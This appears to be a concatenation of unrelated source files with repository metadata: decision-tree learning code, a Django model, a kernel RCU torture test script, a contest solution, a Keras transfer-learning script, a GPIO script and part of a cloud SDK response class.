# 5-fold cross-validation for selecting the best \alpha and it's corresponding subtree
def cross_validate(self, alpha_seq_orig, ref):
# beta_seq = list()
beta_seq = [sqrt(alpha_seq_orig[i] * alpha_seq_orig[i + 1]) for i in range(1, len(alpha_seq_orig))]
# for i in range(1, len(alpha_seq_orig)):
# beta_seq.append(sqrt(alpha_seq_orig[i] * alpha_seq_orig[i + 1]))
beta_seq.append(100)
cv_perf = np.full((5, len(beta_seq)), 10.5)
        cv = KFold(n_splits=5, shuffle=False)  # random_state has no effect when shuffle=False
y = self.data[self.response]
X = self.data.drop(self.response, axis=1)
fold_ind = 0
for train_index, test_index in cv.split(X):
X_train, X_val, y_train, y_val = X.loc[train_index], X.loc[test_index], y.loc[train_index], y.loc[
test_index]
X_train.loc[:, self.response] = y_train
X_val.loc[:, self.response] = y_val
            if self.tree_kind == 'regression':
tree = RegressionTree()
tree.tree_kind = 'regression'
else:
tree = ClassificationTree()
tree.tree_kind = 'classification'
tree.data = X_train
tree.data_type_dict = self.data_type_dict
tree.response = self.response
tree.min_node_size = self.min_node_size
tree.max_node_depth = self.max_node_depth
tree.grow_tree(ref)
best_j = 0
while True:
try:
best_alpha, best_node = tree.get_best_prune(ref)
tree.fuse_vertex(best_node)
subtree_acc = tree.test(X_val)
j = min([index for index, value in enumerate(beta_seq) if best_alpha <= value])
if j == best_j:
cv_perf[fold_ind][j] = min(subtree_acc, cv_perf[fold_ind][j])
else:
cv_perf[fold_ind][j] = subtree_acc
best_j = j
except ValueError:
break
fold_ind += 1
min_index = np.argmin(np.mean(cv_perf, axis=0))
return min_index
# compute the negative log-likelihood score of each split
def iter_split_eval(self, node, ref):
for split in self.iter_split(node):
if node.children is None:
pass
else:
for child in node.children:
child.local_data = child.local_filter(node.local_data)
if node.left.size < self.min_node_size or node.right.size < self.min_node_size:
self.fuse_vertex(node)
continue
# compute the maximum likelihood estimate of the variance parameter of tree given the current split
            if self.tree_kind == 'regression':
for child in node.children:
self.set_node_mu_ml(child, ref)
sigma = sum(self.get_node_sse(leaf, ref) for leaf in self.leaves) / self.data_size
left_impurity = node.left.size * log(sigma)
right_impurity = node.right.size * log(sigma)
split_impurity = left_impurity + right_impurity
else:
for child in node.children:
self.set_node_prob_vec(child)
value_count = self.data[self.response].value_counts()
class_ll_left = [value_count[key]*log(value_count[key] / node.left.size) for key in value_count.keys()]
left_purity = sum(class_ll_left)
class_ll_right = [value_count[key]*log(value_count[key] / node.right.size) for key in value_count.keys()]
right_purity = sum(class_ll_right)
split_impurity = -(left_purity + right_purity)
ret = [split_impurity, node.split_attribute, node.pivot]
yield ret
# access to all possible splits
def iter_split(self, node):
for attribute in self.data.columns:
if attribute != self.response and attribute != 'predictive_var':
for pivot in self.get_pivots(node.local_data, attribute):
self.fuse_vertex(node)
self.split_vertex(vertex=node, pivot=pivot,
split_attribute=attribute)
yield
# split the given vertex based on the given pivot and attribute
def split_vertex(self, vertex, split_attribute, pivot):
super(DecisionTree, self).split_vertex(vertex)
vertex.left = vertex.children[0]
vertex.left.depth = vertex.depth + 1
vertex.right = vertex.children[1]
vertex.right.depth = vertex.depth + 1
vertex.pivot, vertex.split_attribute = pivot, split_attribute
# accessing to all possible pivots of a given attribute
def get_pivots(self, data, attribute):
if self.data_type_dict[attribute] == 'ordinal':
max_pivot = max(data[attribute].unique())
for pivot in data[attribute].unique():
if pivot < max_pivot:
yield pivot
elif self.data_type_dict[attribute] == 'nominal':
values = data[attribute].unique()
n = len(values)
if n <= 1:
return
n = floor(float(n) / 2)
n = int(n)
for r in range(1, n + 1):
for pivot in combinations(values, r):
yield set(pivot)
def stopping_condition(self, node):
if self.max_node_depth <= node.depth:
return True
elif node.size <= self.min_node_size:
return True
else:
return False
def get_node_entropy(self, node):
def entropy_summand(node, p):
if p == 0:
return 0
else:
return float(len(node.local_data)) * p * log(p) # equivalent to n_k * log(p)
return -sum(entropy_summand(node, p) for p in node.prob_vec)
# compute the sum-of-squared error for the current node (for regression trees)
def get_node_sse(self, node, ref):
if not ref:
return sum((y - node.mu) ** 2 for y in node.local_data[self.response])
else:
return sum(sample['predictive_var'] + (sample[self.response] - node.mu) ** 2 for
key, sample in node.local_data.iterrows())
# compute maximum likelihood estimate of the mean parameter of the current node (for regression trees)
def set_node_mu_ml(self, node, ref):
if ref:
node.mu = sum(sample[self.response] for key, sample in node.local_data.iterrows()) / node.size
else:
node.mu = node.local_data[self.response].mean()
# compute the maximum likelihood estimate of the probability vector of the current node (for classification trees)
def set_node_prob_vec(self, node):
size = float(len(node.local_data))
value_count = node.local_data[self.response].value_counts()
node.prob_vec = [value_count[key] / size for key in value_count.keys()]
# returns the best internal node to be prunned with the pruning cost
def get_best_prune(self, ref, alpha=None):
best_cut_cost, best_node = min(self.iter_prune_cost(ref, alpha),
key=lambda x: x[0])
return [best_cut_cost, best_node]
# computes the pruning costs of each internal node
def iter_prune_cost(self, ref, alpha):
for node in self.vertices:
if node not in self.leaves and node is not self.get_root():
yield [self.prune_cost(node, ref, alpha), node]
def prune_cost(self, node, ref, alpha):
        if self.tree_kind == 'regression':
node_cost = 0
for leaf in self.leaves:
if leaf not in self.get_node_leaves(node):
node_cost += self.get_node_sse(leaf, ref)
node_cost += self.get_node_sse(node, ref)
if alpha is None:
node_cost = log(node_cost)
subtree_cost = log(sum(self.get_node_sse(leaf, ref) for leaf in self.leaves))
return (node_cost - subtree_cost) / (len(self.get_node_leaves(node))-1)
elif alpha == 0:
# The goal is to minimize log(\sigma^2) with \sigma^2 = \sum_{i=1^b}\sum(j=1^n_i) SSE_i. This is done by
# selecting a node to be prunned which minimizes C(T_t) where T_t is a subtree generated by prunning the
# internal node t from the tree T.
return log(node_cost)
else:
node_cost = 0
for leaf in self.leaves:
if leaf not in self.get_node_leaves(node):
node_cost += self.get_node_entropy(leaf)
node_cost += self.get_node_entropy(node)
if alpha is None:
subtree_cost = sum(self.get_node_entropy(leaf) for leaf in self.leaves)
return (node_cost - subtree_cost) / (len(self.get_node_leaves(node))-1)
elif alpha == 0:
return node_cost
else:
return node_cost + alpha * (len(self.leaves) - len(self.get_node_leaves(node)) + 1)
# assign the new data to the leaves
def load_new_data(self, data):
self.data = data
self.data_size = len(data)
for node in self.node_iter_down(self.get_root()):
if node.parent == None:
node.local_data = node.local_filter(data)
else:
node.local_data = node.local_filter(node.parent.local_data)
# fetching the leaves of a subtree rooted at node
def get_node_leaves(self, node):
leaves = set([])
for descendant in self.node_iter_down(node):
if descendant in self.leaves:
leaves.add(descendant)
return leaves
# traversing a subtree rooted at base to its leaves
def node_iter_down(self, base, first=True):
if first:
yield base
if base.children == None:
return
if base.children == None:
yield base
else:
for child in base.children:
yield child
for node in self.node_iter_down(child, first=False):
yield node
def train(self, tr_data, data_type_dict, parameters, output_path=None, tst_data=None, run=None, m_ind=None):
''' parameters:
run: index of each run in [1,50],
m_ind: method index: 0 refers to the interpretability prior approach (when fitting proxy model to the original
training data; 1-3 refers to the proxy model fitted to the reference model where:
1: BART with ntree obtained using CV
2: BART with ntree = 3, and
3: GP.'''
self.vertices = []
self.edges = set([])
self.leaves = set([])
self.data_type_dict = data_type_dict
self.tree_kind = parameters['tree_kind']
self.response = parameters['response']
self.min_node_size = parameters['min_node_size']
self.max_node_depth = parameters['max_node_depth']
alpha = parameters['alpha']
prune = parameters['prune']
ref = parameters['ref']
self.data = tr_data
self.grow_tree(ref)
if prune:
if alpha is None:
return self.prune_tree(alpha, tst_data, ref, run, m_ind, output_path)
else:
self.prune_tree(alpha, tst_data, ref, run, m_ind, output_path)
# fetching all the data of a leaf node
def get_data_leaf(self, datapoint):
if self.children is None:
return self
else:
if type(self.pivot) == set:
if datapoint[self.split_attribute] in self.pivot:
return self.left.get_data_leaf(datapoint)
else:
return self.right.get_data_leaf(datapoint)
else:
if datapoint[self.split_attribute] <= self.pivot:
return self.left.get_data_leaf(datapoint)
else:
return self.right.get_data_leaf(datapoint)
# find the leaf node to which newdata belongs and send back the mean parameter of the leaf
def predict(self, newdata):
predictions = np.zeros(newdata.shape[0])
for i, (index, datapoint) in enumerate(newdata.iterrows()):
            if self.tree_kind == 'regression':
predictions[i] = self.vertices[0].get_data_leaf(datapoint).mu
else:
probs = self.vertices[0].get_data_leaf(datapoint).prob_vec
predictions[i] = probs.index(max(probs))
return predictions
# compute the RMSE of the test data
def test(self, data):
        if self.tree_kind == 'regression':
pred = self.predict(data)
return sqrt(sum((data[self.response] - pred) ** 2)/len(data))
else:
miss_classification_rate = 0
for leaf in self.leaves:
leaf.predicted_class = leaf.prob_vec.index(max(leaf.prob_vec))
leaf_error = leaf.local_data[self.response].value_counts()
if leaf.predicted_class in leaf_error.keys():
leaf_error = 1 - leaf_error[leaf.predicted_class]/float(len(leaf.local_data))
else:
leaf_error = 1
miss_classification_rate += leaf_error
return miss_classification_rate
class RegressionTree(DecisionTree, object):
def __init__(self, **kwargs):
super().__init__(**kwargs)
def plot(self, s = 0, margin = 35):
A = self.get_adjacency_matrix_as_list()
convert_to_igraph = ig.Graph.Adjacency(A)
g = convert_to_igraph
for vertex in self.vertices:
index = self.vertices.index(vertex)
if vertex.pivot != None:
if type(vertex.pivot) == set:
label_pivot = ' in ' + str(list(vertex.pivot))
else:
label_pivot = ' less than ' + str(round(vertex.pivot, 2))
g.vs[index]['label'] = str(vertex.split_attribute) + label_pivot
g.vs[index]['label_dist'] = 3
g.vs[index]['label_color'] = 'red'
g.vs[index]['color'] = 'red'
g.vs[index]['size'] = 40
else:
label = round(vertex.mu, 2)
g.vs[index]['color'] = 'blue'
g.vs[index]['label'] = str(label)
g.vs[index]['label_dist'] = 1
g.vs[index]['label_color'] = 'blue'
g.vs[index]['size'] = 40
root_index = self.vertices.index(self.get_root())
layout = g.layout_reingold_tilford(root=[root_index])
ig.plot(g, layout=layout, margin=margin)
class ClassificationTree(DecisionTree, object):
def __init__(self, **kwargs):
super().__init__(**kwargs)
def plot(self, s=0, margin=35):
A = self.get_adjacency_matrix_as_list()
convert_to_igraph = ig.Graph.Adjacency(A)
g = convert_to_igraph
for vertex in self.vertices:
index = self.vertices.index(vertex)
if vertex.pivot != None:
if type(vertex.pivot) == set:
label_pivot = ' in ' + str(list(vertex.pivot))
else:
label_pivot = ' less than ' + str(vertex.pivot)
g.vs[index]['label'] = str(vertex.split_attribute) + label_pivot
g.vs[index]['label_dist'] = 3
g.vs[index]['label_color'] = 'red'
g.vs[index]['color'] = 'red'
g.vs[index]['size'] = 40
else:
label = str(vertex.predicted_class)
g.vs[index]['color'] = 'blue'
g.vs[index]['label'] = label
g.vs[index]['label_dist'] = 1
g.vs[index]['label_color'] = 'blue'
g.vs[index]['size'] = 40
root_index = self.vertices.index(self.get_root())
layout = g.layout_reingold_tilford(root=root_index)
ig.plot(g, "example_tree_" + str(s) + ".pdf", layout=layout, bbox=(650, 650), margin=margin)
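# Usage sketch added for illustration: the CSV file, column names and parameter
# values below are hypothetical; 'alpha', 'prune' and 'ref' follow the meanings
# documented in DecisionTree.train() above.
if __name__ == '__main__':
    import pandas as pd
    df = pd.read_csv('housing.csv')  # hypothetical training data with a 'price' target
    dtypes = {col: 'ordinal' for col in df.columns if col != 'price'}
    params = {'tree_kind': 'regression', 'response': 'price',
              'min_node_size': 10, 'max_node_depth': 4,
              'alpha': None, 'prune': False, 'ref': False}
    tree = RegressionTree()
    tree.train(df, dtypes, params)   # grow an unpruned regression tree
    print('training RMSE:', tree.test(df))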
|
[
"[email protected]"
] | |
afcb824861fbac4be730a519487cc5aca554d744
|
2836d0c8648a02f326bac0f5748a57ff1bcf0169
|
/issue/models.py
|
73961f57dcf9cddc29ff756dd29acb582d9e36ff
|
[] |
no_license
|
blockbyte-sbhack19/web
|
dce37bf81a2a801bed892f7a061d58f42864d1f2
|
543db71b7616e4c1fd2bdba333ec3a9efa45a40a
|
refs/heads/master
| 2020-06-08T08:40:16.501744 | 2019-06-22T20:26:20 | 2019-06-22T20:26:20 | 193,198,744 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 298 |
py
|
from django.db import models
class Soil(models.Model):
location = models.CharField(max_length=200)
size = models.CharField(max_length=200)
price = models.CharField(max_length=200)
beforeDate = models.DateTimeField('beforeDate')
afterDate = models.DateTimeField('afterDate')
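# Usage sketch (hypothetical values; assumes `from django.utils import timezone`):
#     Soil.objects.create(location="Bern", size="2 ha", price="1200",
#                         beforeDate=timezone.now(), afterDate=timezone.now())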
|
[
"[email protected]"
] | |
1ba4b6a2f09c11c36c36f246039c90cfc4286031
|
7f402e7bf0f56f3f5d4251e8e39352855816156c
|
/ubuntu/scripts/rcutorture.py
|
6b7d6ac997dce39a667ff64fc15abb768ed63239
|
[] |
no_license
|
wuyuer/lava-test-cases
|
3aab1b92e610351102f857183a0361e0a524af8c
|
4e2c280a8ef53e082336290d37500520f18430b9
|
refs/heads/master
| 2021-01-10T02:22:29.748180 | 2016-01-13T11:58:39 | 2016-01-13T11:58:39 | 49,557,984 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,548 |
py
|
#!/usr/bin/env python
#
# RCU Torture test for Linux Kernel.
#
# Copyright (C) 2010 - 2014, Linaro Limited.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# Author: Botao Sun <[email protected]>
import os
import sys
import time
import shlex
import subprocess
# Result collection for LAVA
debug_switcher = False
def collect_result(testcase, result):
if debug_switcher is False:
subprocess.call(['lava-test-case', testcase, '--result', result])
else:
print ['lava-test-case', testcase, '--result', result]
# Switch to home path of current user
home_path = os.path.expanduser("~")
os.chdir(home_path)
print os.getcwd()
# RCU Torture start check
rcutorture_start = 'modprobe rcutorture'
rcutorture_time = sys.argv[1]
start_return = subprocess.call(shlex.split(rcutorture_start))
if start_return != 0:
collect_result('rcutorture-start', 'fail')
collect_result('rcutorture-module-check', 'skip')
collect_result('rcutorture-end', 'skip')
sys.exit(1)
else:
print 'RCU Torture test started. Test time is ' + str(rcutorture_time) + ' Seconds.'
collect_result('rcutorture-start', 'pass')
time.sleep(int(rcutorture_time))
# RCU Torture module check
lsmod_output = subprocess.check_output(['lsmod'])
print lsmod_output
lsmod_list = lsmod_output.split()
torture_list = filter(lambda x: x.find('torture') != -1, lsmod_list)
if torture_list == []:
print 'Cannot find rcutorture module in lsmod, abort!'
collect_result('rcutorture-module-check', 'fail')
collect_result('rcutorture-end', 'skip')
sys.exit(1)
elif len(torture_list) == 1:
rcutorture_end = 'rmmod ' + torture_list[0]
collect_result('rcutorture-module-check', 'pass')
elif len(torture_list) > 1:
print 'More than one item with torture in name, please check it manually.'
collect_result('rcutorture-module-check', 'fail')
collect_result('rcutorture-end', 'skip')
sys.exit(1)
# RCU Torture result check
end_keyword = 'rcu-torture:--- End of test'
end_return = subprocess.call(shlex.split(rcutorture_end))
if end_return != 0:
print 'RCU Torture terminate command ran failed.'
collect_result('rcutorture-end', 'fail')
sys.exit(1)
else:
keyword_counter = 0
output = subprocess.check_output(['dmesg'])
output_list = output.split('\n')
for item in output_list:
if end_keyword in item:
keyword_counter = keyword_counter + 1
print 'RCU Torture test has finished.'
if 'SUCCESS' in item:
collect_result('rcutorture-end', 'pass')
sys.exit(0)
else:
print 'RCU Torture finished with issues.'
collect_result('rcutorture-end', 'fail')
sys.exit(1)
if keyword_counter == 0:
print 'Cannot find the ending of this RCU Torture test.'
collect_result('rcutorture-end', 'fail')
|
[
"[email protected]"
] | |
4b7a7e5245954567017ea30f2e6e5b2a68d61c27
|
38c35956be6343855914b1c58b8fbd2e40c6e615
|
/AdHoc/1030.py
|
6cab25d7e55eca194d128a95ba59b1e53ae65c24
|
[] |
no_license
|
LucasBarbosaRocha/URI
|
b43e4f4a6b3beed935f24839001bea354411c4bd
|
2c9bcc13300a9f6243242e483c8f9ec3296a88ad
|
refs/heads/master
| 2020-06-25T05:06:51.297824 | 2019-08-22T04:50:11 | 2019-08-22T04:50:11 | 199,210,037 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 450 |
py
|
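# Note added for clarity: each test case reads n (people standing in a circle)
# and k (step size); every k-th surviving position is marked -1 until a single
# person remains, and that survivor's 1-based index is printed.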
nc = int(input())
for i in range(nc):
entrada = input().split(" ")
n = int(entrada[0])
k = int(entrada[1])
lista = [1]*n
vivos = n
pos = 0
while vivos > 1:
j = 0
while j < k:
while (lista[pos] == -1):
pos = pos + 1
if (pos == n):
pos = 0
pos = pos + 1
if (pos == n):
pos = 0
j = j + 1
lista[pos - 1] = -1
vivos = vivos - 1
#print (lista)
print ("Case %d: %d" %((i+1), lista.index(max(lista)) + 1))
|
[
"[email protected]"
] | |
3179f9de593ae3fcecf09342a4adc0d941e09c45
|
586ee79d0963d6183cf45656c2b0b9dd115226ce
|
/python_basic/textFile/textPross.py
|
2723559965dc1d5952ece9bc84a0ad1e501c5d31
|
[] |
no_license
|
nie-xin/GeometryAlgorithms
|
afd62e3c5e45c1ddeb0c0fa768accc0b2d5ea176
|
392fde108b24a7c23c4e61c211cfe3d8e7901338
|
refs/heads/master
| 2021-01-18T13:54:39.332207 | 2013-12-10T12:39:16 | 2013-12-10T12:39:16 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 316 |
py
|
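# Note added for clarity: sketch.txt is expected to contain transcript lines of
# the form "Speaker: spoken words"; split(':', 1) below separates the speaker
# from everything after the first colon. Illustrative input line:
#     Man: Is this the right room for an argument?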
import os
if os.path.exists('sketch.txt'):
data = open('sketch.txt')
for each_line in data:
if not each_line.find(':') == -1:
(role, line_spoken) = each_line.split(':', 1)
print(role, end='')
print(' said: ', end='')
print(line_spoken, end='')
data.close()
else:
print('The data file is missing')
|
[
"[email protected]"
] | |
31fd854d20dd39dbe8cb2df8574a881bb9c4c0bc
|
49c626418cf64cf0bae7bc5a9a481359692e0a19
|
/5-21.py
|
de8ca4dfa3cf3c9cf67ad74b6214d81dd4b16c67
|
[] |
no_license
|
WebGLer/on-my-window
|
086c53090ff3bdcc5f139bb1fd0ab3f55c3bb68c
|
a625687c0493746dcc3d098950eb0c582f29e911
|
refs/heads/master
| 2020-07-22T12:19:54.161777 | 2019-11-26T09:19:08 | 2019-11-26T09:19:08 | 207,200,697 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,001 |
py
|
# set the paths to the dataset folders
import os
base_dir = "D:\\参赛文件\\cats_and_dogs_small"
train_dir = os.path.join(base_dir,'train')
validation_dir = os.path.join(base_dir,'validation')
test_dir = os.path.join(base_dir,'test')
# feature extraction with data augmentation
from tensorflow.python.keras.applications import VGG16
data_path = "F:\\5-model data\\vgg16_weights_tf_dim_ordering_tf_kernels_notop.h5"
conv_base = VGG16(
weights = data_path,
include_top =False,
input_shape = (150,150,3)
)
from tensorflow.python.keras import layers,models
model = models.Sequential()
model.add(conv_base)
model.add(layers.Flatten())
model.add(layers.Dense(256,activation='relu'))
model.add(layers.Dense(1,activation='sigmoid'))
print("model.trainable_weights=",len(model.trainable_weights))
# conv_base.trainable = False
#冻结conv_base层网络并将最后一个卷积层解冻
set_trainable = False
for layer in conv_base.layers:
if layer.name =='block5_conv1':
set_trainable = True
if set_trainable:
layer.trainable = True
else:
layer.trainable = False
print("After freeaed model.trainable_weights=",len(model.trainable_weights))
from tensorflow.python.keras.preprocessing.image import ImageDataGenerator
from tensorflow.python.keras import optimizers
train_datagen = ImageDataGenerator(
rescale=1./255,
rotation_range=40,
width_shift_range=0.2,
height_shift_range=0.2,
shear_range=0.2,
zoom_range=0.2,
horizontal_flip=True,
fill_mode='nearest'
)
validation_datagen = ImageDataGenerator(rescale=1./255)
train_generator = train_datagen.flow_from_directory(
train_dir,
target_size=(150,150),
batch_size=20,
class_mode='binary'
)
validation_generator = validation_datagen.flow_from_directory(
validation_dir,
target_size=(150,150),
batch_size=20,
class_mode='binary'
)
model.compile(
loss='binary_crossentropy',
optimizer=optimizers.RMSprop(lr=1e-5),
metrics=['acc']
)
history = model.fit_generator(
train_generator,
steps_per_epoch=100,
epochs=100,
validation_data=validation_generator,
validation_steps=50
)
# save the model
import time
now = time.strftime('%Y-%m-%d %H-%M-%S')
file_path = "E:\\1- data\\models\\"+now+" cats_and_dogs VGG16-数据增强-模型最后卷积层网络微调.h5"
model.save(file_path)
# plot the training and validation curves
import matplotlib.pyplot as plt
acc = history.history['acc']
val_acc = history.history['val_acc']
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs = range(1,len(acc)+1)
plt.plot(epochs,acc,'bo',label = 'Training acc')
plt.plot(epochs,val_acc,'b',label ='Validation acc' )
plt.title('Training and Validation accuracy')
plt.legend()
plt.figure()
plt.plot(epochs,loss,'bo',label = 'Training loss')
plt.plot(epochs,val_loss,'b',label ='Validation loss' )
plt.title('Training and Validation Loss')
plt.legend()
plt.show()
|
[
"[email protected]"
] | |
d48a095767b13aa2d16d266ded3f78a690976077
|
26d04fb000bdd882120109c5aec82c26fb1d9cdb
|
/interface/truck/__init__.py
|
e810248328b99d73020b3228397809e9354e9401
|
[] |
no_license
|
blomqvist/thesis
|
445ae2dafebd2c2361ec28f9a9c1e55b1f20a4d7
|
532d0e47a18c05cf643a5898c6f92020d2f7e6d0
|
refs/heads/master
| 2020-05-17T04:22:37.097397 | 2016-01-28T18:21:40 | 2016-01-28T18:21:40 | 30,926,038 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 19 |
py
|
__all__ = ["Truck"]
|
[
"[email protected]"
] | |
177debec7b606199f56acb03e4ef5f5046d2badc
|
895d67c065919ac132f9ef9ddeb667d8d4aca4cc
|
/pratice_wework_delete_contactor_po_appium/page/info.py
|
338a28dccc28f71ab88dc664da45f652b66bd35c
|
[] |
no_license
|
testdemo11/Hogwart_pratice
|
57df9afb1038b77bfccefe3f6cdffaf2cce41175
|
ebc025a2272beb5f0d25fd16ea7d06ffe460ed23
|
refs/heads/main
| 2023-03-28T08:04:01.716982 | 2021-03-30T03:50:23 | 2021-03-30T03:50:23 | 350,715,597 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 417 |
py
|
# -*- coding:utf-8 -*-
__author__ = 'Tnew'
from pratice_demo.pratice_wework_delete_contactor_po_appium.basepage import BasePage
from pratice_demo.pratice_wework_delete_contactor_po_appium.page.edit import Edit
class Info(BasePage):
def goto_edit_contactor(self):
        # tap "More" to open the contact information editing screen
self.step('../data/info.yaml',"goto_edit_contactor")
return Edit(self.driver)
|
[
"[email protected]"
] | |
bd3dba7cedd5c61ce2c28d80320106ebde0e7bd2
|
ec8d7c3176187359c7618bd591724ea93a9b0772
|
/python/testing/cookbook/01-unit/recipe5.py
|
e519029af5beb796eb5f3a107a9494b28b0e38ed
|
[] |
no_license
|
almacro/snippets
|
7000faf593ab97a0890ea56d944ceef4ef23643a
|
e247c5bc26f336add1c7be8636775f841a65615d
|
refs/heads/master
| 2023-08-05T11:00:13.161159 | 2023-07-23T15:31:42 | 2023-07-23T15:31:42 | 65,136,325 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 974 |
py
|
class RomanNumeralConverter(object):
def __init__ (self):
self.digit_map = {"M":1000, "D":500, "C":100, "L":50, "X":10, "V":5, "I":1}
def convert_to_decimal(self, roman_numeral=""):
val = 0
for char in roman_numeral:
val += self.digit_map[char]
return val
import unittest
class RomanNumeralConverterTest(unittest.TestCase):
def setUp(self):
self.cvt = RomanNumeralConverter()
def test_parsing_millenia(self):
self.assertEqual(1000, self.cvt.convert_to_decimal("M"))
def test_parsing_century(self):
self.assertEqual(100, self.cvt.convert_to_decimal("C"))
class RomanNumeralComboTest(unittest.TestCase):
def setUp(self):
self.cvt = RomanNumeralConverter()
def test_multi_millenia(self):
self.assertEqual(4000, self.cvt.convert_to_decimal("MMMM"))
def test_multi_add_up(self):
self.assertEqual(2010, self.cvt.convert_to_decimal("MMX"))
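# Runner added for convenience (not part of the original recipe); it lets the
# tests run directly via `python recipe5.py` as well as through a test runner.
if __name__ == '__main__':
    unittest.main()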
|
[
"[email protected]"
] | |
548ae2da86ee3cad8a9df7b3561adf9b60b9ef4c
|
2aafa49c445580d39d647b753081a9a4a38614cf
|
/src/Guidance_system/guidance_sys/GPIO.py
|
ed85194103ada3ea6f56d75a5d29ec9d0a03988e
|
[
"MIT"
] |
permissive
|
Joseph-tsai415/Msc-All-Terrain-Robot
|
e623dc3438764877545ec2229f84e4a0c22953fb
|
40973b8d1b088d37efc372f6313ee58d18792c02
|
refs/heads/master
| 2023-01-16T00:39:11.932757 | 2020-11-30T10:51:38 | 2020-11-30T10:51:38 | 297,651,543 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 695 |
py
|
import RPi.GPIO as GPIO
from time import sleep # this lets us have a time delay (see line 12)
# for GPIO numbering, choose BCM
GPIO.setmode(GPIO.BCM)
# or, for pin numbering, choose BOARD
#GPIO.setmode(GPIO.BOARD)
GPIO.setup(25, GPIO.IN,pull_up_down=GPIO.PUD_DOWN) # set GPIO 25 as input
GPIO.setup(18, GPIO.OUT)
GPIO.output(18, GPIO.HIGH)
try:
while True: # this will carry on until you hit CTRL+C
#if GPIO.input(25): # if port 25 == 1
print(GPIO.input(25))
sleep(0.1) # wait 0.1 seconds
except KeyboardInterrupt:
GPIO.cleanup() # clean up after yourself
#https://learn.sparkfun.com/tutorials/raspberry-gpio/python-rpigpio-api
|
[
"[email protected]"
] | |
546e354836cc463b0eb0ee84e5a037c8c4895543
|
dcb0bb373ff999dc784e68f2d05cccd26548da67
|
/manage.py
|
1a34b77f248a40122a51aadead42a3d014da3476
|
[] |
no_license
|
JulioLopez2/DjangoTut
|
cc1c09975cdb6523f0ad787a6479940c45782860
|
00ec21e39ff409b240556c63b49a4c32098431d3
|
refs/heads/main
| 2023-04-17T22:54:20.707978 | 2021-04-30T22:53:03 | 2021-04-30T22:53:03 | 361,031,405 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 563 |
py
|
#!/usr/bin/env python
import os
import sys
print("Hello world")
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "trydjango.settings")
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
|
[
"[email protected]"
] | |
5be296e2bc7bd3fdd5941a9aa4e3e8e66ecaa693
|
a2d36e471988e0fae32e9a9d559204ebb065ab7f
|
/huaweicloud-sdk-meeting/huaweicloudsdkmeeting/v1/model/search_his_meetings_response.py
|
9079e05888af9d2c2ce545a7033572d3306fef6e
|
[
"Apache-2.0"
] |
permissive
|
zhouxy666/huaweicloud-sdk-python-v3
|
4d878a90b8e003875fc803a61414788e5e4c2c34
|
cc6f10a53205be4cb111d3ecfef8135ea804fa15
|
refs/heads/master
| 2023-09-02T07:41:12.605394 | 2021-11-12T03:20:11 | 2021-11-12T03:20:11 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,130 |
py
|
# coding: utf-8
import re
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class SearchHisMeetingsResponse(SdkResponse):
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'offset': 'int',
'limit': 'int',
'count': 'int',
'data': 'list[ConferenceInfo]'
}
attribute_map = {
'offset': 'offset',
'limit': 'limit',
'count': 'count',
'data': 'data'
}
def __init__(self, offset=None, limit=None, count=None, data=None):
"""SearchHisMeetingsResponse - a model defined in huaweicloud sdk"""
super(SearchHisMeetingsResponse, self).__init__()
self._offset = None
self._limit = None
self._count = None
self._data = None
self.discriminator = None
if offset is not None:
self.offset = offset
if limit is not None:
self.limit = limit
if count is not None:
self.count = count
if data is not None:
self.data = data
@property
def offset(self):
"""Gets the offset of this SearchHisMeetingsResponse.
        The start offset (index of the first returned record).
:return: The offset of this SearchHisMeetingsResponse.
:rtype: int
"""
return self._offset
@offset.setter
def offset(self, offset):
"""Sets the offset of this SearchHisMeetingsResponse.
        The start offset (index of the first returned record).
:param offset: The offset of this SearchHisMeetingsResponse.
:type: int
"""
self._offset = offset
@property
def limit(self):
"""Gets the limit of this SearchHisMeetingsResponse.
        Number of records per page.
:return: The limit of this SearchHisMeetingsResponse.
:rtype: int
"""
return self._limit
@limit.setter
def limit(self, limit):
"""Sets the limit of this SearchHisMeetingsResponse.
        Number of records per page.
:param limit: The limit of this SearchHisMeetingsResponse.
:type: int
"""
self._limit = limit
@property
def count(self):
"""Gets the count of this SearchHisMeetingsResponse.
        Total number of records.
:return: The count of this SearchHisMeetingsResponse.
:rtype: int
"""
return self._count
@count.setter
def count(self, count):
"""Sets the count of this SearchHisMeetingsResponse.
        Total number of records.
:param count: The count of this SearchHisMeetingsResponse.
:type: int
"""
self._count = count
@property
def data(self):
"""Gets the data of this SearchHisMeetingsResponse.
        List of meeting information.
:return: The data of this SearchHisMeetingsResponse.
:rtype: list[ConferenceInfo]
"""
return self._data
@data.setter
def data(self, data):
"""Sets the data of this SearchHisMeetingsResponse.
        List of meeting information.
:param data: The data of this SearchHisMeetingsResponse.
:type: list[ConferenceInfo]
"""
self._data = data
def to_dict(self):
